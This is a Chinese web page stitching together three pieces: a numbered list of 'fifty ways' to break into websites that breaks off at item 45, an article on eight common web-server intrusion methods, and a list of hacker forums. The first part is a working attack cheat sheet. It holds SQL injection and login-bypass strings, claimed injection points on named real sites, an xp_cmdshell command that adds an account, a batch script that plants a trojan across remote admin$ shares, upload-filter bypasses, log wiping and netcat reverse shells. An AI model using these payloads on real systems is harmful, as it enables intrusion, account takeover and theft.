篇一:黑客入侵网站的 50种方法
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%'and 1=1 and '%'='
关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是
4.我们先到底下搜索一下co net mib ver 1.0
密码帐号都是 'or'='or'
5.挂马代码
6./24小时挂qq工具
7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出guest是管理员来
7.只要敢想,新浪也可入侵 注入点
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59
微软官方网站注入点
/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=
8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马
9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
sql注入后,如何上传木马,
文章地址 http://hack123.home4u.china.com/0601.htm
10.qq强制聊天代码
http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。
11. mybbs论坛cookie欺骗 后台备份马
12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等
用法: 安装: instsrv.exe 服务名称 路径
卸载: instsrv.exe 服务名称 remove
13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陆密码
14.搜索的技巧 inurl:网址
15.启航工作室wms 5.0网站程序漏洞
在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)
利用动画看http://soft.77169.com/62/20050530/6824.html
16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以木马不会变~
17.天意商务系统网上依然有 有漏洞 网站具体的样式
地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面
18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了
工具使用方法动画和所有文件
/bbs/printpage.asp?boardid=2&id=811
20.缺少xp_cmdshell时
尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
假如恢复不成功,可以尝试直接加用户(针对开3389的)
6IQb*QdQ;m0
declare @o int
exec sp_oacreate 'wscrīpt.shell',@o out
exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理员
21.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头
22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址
23.dv7.1用还原数据功能 还原asa木马
24.凡人网络购物系统v6.0 可以%5c暴库
25.ipb2.0.2漏洞 构造语句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具
有下载
26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间
27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲
28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马
29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路
30.在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下: 保存为.asp,程序照样 执行.
31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马
32.喜欢网页挂马的看看这篇总结文章吧
http://77169.com/news/hk/2005060611656.html
33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库
34.iis6 for windows 2003 enterprise edition 如iis发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip
然后用#clear logg和#clear line vty *删除日志
36.搜索关键字:"copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多
37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具:bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马
38.学会总结入侵思路/news/hk/2005060811688.html
39.电脑坏了省去重新安装系统的方法
纯dos下执行,
xp:copy c:\windows\repair\*.* 到c:\windows\system32\config
2k: copy c:\winnt\repair\*.* 到c:\winnt\system32\config
40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱,因此当我的机子中了此木马后没有立即杀掉进程,而是用内存编辑工具打开它的进程,查找smtp字样,就会找到它的信箱和密码了。只对1.5以前的管用.
41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的
http://soft.77169.com/62/20050608/6878.html
42.有许多管理员用备份的日期做备份数据库的名字
比如/bbs/databackup/20050601.mdb
43.动网数据库oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2
不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面
/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2
%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是“填写登录信息”
那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名
44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户
45.解决tcp/ip筛选 在注册表里有三处,分别是:
篇二:详解黑客入侵Web服务器的常用八种方式
详解黑客入侵Web服务器的常用八种方式
发布时间:2012-6-13 14:21:37 被阅览数:次 来源:厦门凌众科技有限公司 onclick=tagshow(event)
href="tag.php?name=%B7%FE%CE%F1%C6%F7">服务器一般都很容易成为黑客们的入侵对象,本文向广大的onclick=tagshow(event)
href="tag.php?name=%CD%F8%B9%DC">网管员们介绍了黑客们常用的八种入侵onclick=tagshow(event)
href="tag.php?name=%B9%A5%BB%F7">攻击方式,供大家参考!
一、WEBonclick=tagshow(event)
href="tag.php?name=%B7%FE%CE%F1">服务器面临威胁
在了解WEB服务器的安全状况之前,首先要让大家了解网站安全的另一面——黑客攻击。97至98年互联网开始在onclick=tagshow(event) href="tag.php?name=%D6%D0%B9%FA">中国兴起之时,黑客就已经诞生了,在98年印尼排华事件中,中国黑客对印尼ZF网站的打击行动通过媒体的渲染,让黑客一词进入了广大中国网民的眼帘。随着几次黑客大战的爆发以及媒体对黑客的渲染,让更多人加入了黑客这个队伍。那么黑客都是通过怎样的onclick=tagshow(event)
href="tag.php?name=%BC%BC%CA%F5">技术手段实施攻击的呢?97年到2002年以来,除了比较有名的UNICODE漏洞之外,黑客们大部分都是利用onclick=tagshow(event)
href="tag.php?name=%CF%B5%CD%B3">系统的各种溢出漏洞来实施入侵,包括像ipc共享空连接漏洞,ida/idq,printer漏洞,rpc漏洞等等。2003年,中国互联网开始从01年的互联网寒冬逐渐走向复苏,盛大、分众传媒、空中网等一系列ITonclick=tagshow(event)
href="tag.php?name=%C6%F3%D2%B5">企业分别在纳斯达克上市成功更进一步激起了更多IT从业人员开始开设网站和成立IT公司,梦想有一日能上纳斯达克拿onclick=tagshow(event)
href="tag.php?name=%C3%C0%B9%FA">美国股民的钱。网站数量的激增以及大家对onclick=tagshow(event)
href="tag.php?name=%CD%F8%C2%E7">网络安全的轻视,导致通过WEB的各种漏洞来进行入侵的事件越来越多。SQL注入漏洞随着黑客onclick=tagshow(event) href="tag.php?name=%B8%DF%CA%D6">高手们一次又一次地使用在拿国内外onclick=tagshow(event)
href="tag.php?name=%D3%CE%CF%B7">游戏onclick=tagshow(event)
href="tag.php?name=%CA%FD%BE%DD%BF%E2">数据库和游戏网站的权限,并高价卖出,买车买房子之时,SQL注入以及相关技术在黑客的群体中普及开来。黑客们在比尔.盖茨先生弥补了大部分系统漏洞之后,开始转移方向,发现基于网站的各种脚本漏洞能非常轻易的使用, 而且能够通过提权来获取系统权限。于是,基于web的脚本漏洞成功黑客们的最爱。随后流氓onclick=tagshow(event)
href="tag.php?name=%C8%ED%BC%FE">软件开始在中国的互联网大地上盛行了起来,互联网的网站应用领域的黑客入侵技术开始流行了起来。最典型的就是黑客的网站挂马技术,这种技术就是利用网站的漏洞建立或者上传一个onclick=tagshow(event)
href="tag.php?name=ASP">ASPonclick=tagshow(event)
href="tag.php?name=%C4%BE%C2%ED">木马的方式来获取网站的
WEBSHELL权限,然后通过WEBSHELL权限通过提权获取系统权限,再接着就是在服务器的网站里面加入一些恶意的脚本
onclick=tagshow(event) href="tag.php?name=%B4%FA%C2%EB">代码,让你的onclick=tagshow(event) href="tag.php?name=%B5%E7%C4%D4">电脑在onclick=tagshow(event)
href="tag.php?name=%B7%C3%CE%CA">访问网站的时候,不知不觉的中病毒和黑客onclick=tagshow(event)
href="tag.php?name=%B3%CC%D0%F2">程序,最后你电脑里面的重要资料,QQ号,网络游戏帐号,网上银行帐户里面的现金都会不翼而飞。 据专业权威机构统计,02年中国境内网站被入侵的比例不到10%,而到了06年,中国境内网站被入侵的比例是85%。黑客技术的普及化以及巨大商业利益的窃取网上银行的资金,QQ号码倒卖,网络游戏装备和帐号的倒卖等地下黑客产业链的形成是导致网站遭遇安全事件的主因。
二、WEB的各种攻击手段
1、SQL注入漏洞的入侵
这种是ASP+ACCESS的网站入侵方式,通过注入点列出
onclick=tagshow(event) href="tag.php?name=%CA%FD%BE%DD">数据库里面onclick=tagshow(event)
href="tag.php?name=%B9%DC%C0%ED">管理员的帐号和
onclick=tagshow(event) href="tag.php?name=%C3%DC%C2%EB">密码信息,然后猜解出网站的后台onclick=tagshow(event)
href="tag.php?name=%B5%D8%D6%B7">地址,然后用帐号和密码登录
进去找到onclick=tagshow(event)
href="tag.php?name=%CE%C4%BC%FE">文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。
2、ASP上传漏洞的利用
这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。
3、后台数据库备份方式获得WEBSHELL
这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP,那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。
4、网站旁注入侵
这种技术是通过IP绑定onclick=tagshow(event)
href="tag.php?name=%D3%F2%C3%FB">域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。
5、sa注入点利用的入侵技术
这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统onclick=tagshow(event) href="tag.php?name=%C3%FC%C1%EE">命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听onclick=tagshow(event)
href="tag.php?name=%B6%CB%BF%DA">端口,然后用VBS一句话木马onclick=tagshow(event) href="tag.php?name=%CF%C2%D4%D8">下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。
6、sa弱密码的入侵技术
这种方式是用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码,然后用SQLEXEC之类的onclick=tagshow(event)
href="tag.php?name=%B9%A4%BE%DF">工具通过1433端口连接到远
程服务器上,然后开设系统帐号,通过3389登录。然后这种入侵方式还可以配合WEBSHELL来使用,一般的ASP+MSSQL网站通常会把MSSQL的连接密码写到一个配置文件当中,这个可以用WEBSHELL来读取配置文件里面的SA密码,然后可以上传一个SQL木马的方式来获取系统的控制权限。
7、提交一句话木马的入侵方式
这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,onclick=tagshow(event)
href="tag.php?name=%C2%DB%CC%B3">论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。
8、论坛漏洞利用入侵方式
这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的onclick=tagshow(event)
href="tag.php?name=%D3%C3%BB%A7">用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。
学完这八种技术,身为网管员的你是否对黑客入侵服务器的方式有了详细的了解呢?更是否得出了有效的应对服务器入侵的
onclick=tagshow(event) href="tag.php?name=%B0%EC%B7%A8">办法呢?
篇三:中国几大黑客网站
1,华夏黑客同盟:
中国最大的黑客类门户网站,有网络安全培训,网络安全服务,各种工具,教程,论坛http://77169.org/index.html
2,中国黑客联盟:
不用我多介绍了吧
/
3,中国红客联盟:
中国一个著名黑客组织站点
/index.htm
4,黑客基地:
作为一名黑客,你没过就是你的遗憾
http://dx.hackbase.com/
5,中国爱国大联盟
http://new.shockhack.net/index.asp
6,第8军团:
中国一个著名黑客组织站点
http://down.juntuan.net/index.html
7,黑客风云:
没去过就是你的遗憾了!
8,安全中国:
全球最大中文网络安全门户
/
9,黑客炼狱:
很全面的一个黑客网站,工具也很全
/index.html
11,20cn小组:
中国一个著名黑客组织站点
.cn/dh/
13,木马帝国:
木马王国
/SoftList/Catalog8/SoftList_Time_1.html
《黑客木马网站》
由:免费论文网互联网用户整理提供,链接地址:
http://m.csmayi.cn/meiwen/23052.html
转载请保留,谢谢!
- 上一篇:祭祖大典仪式程序
- 下一篇:cpu不涂硅脂可以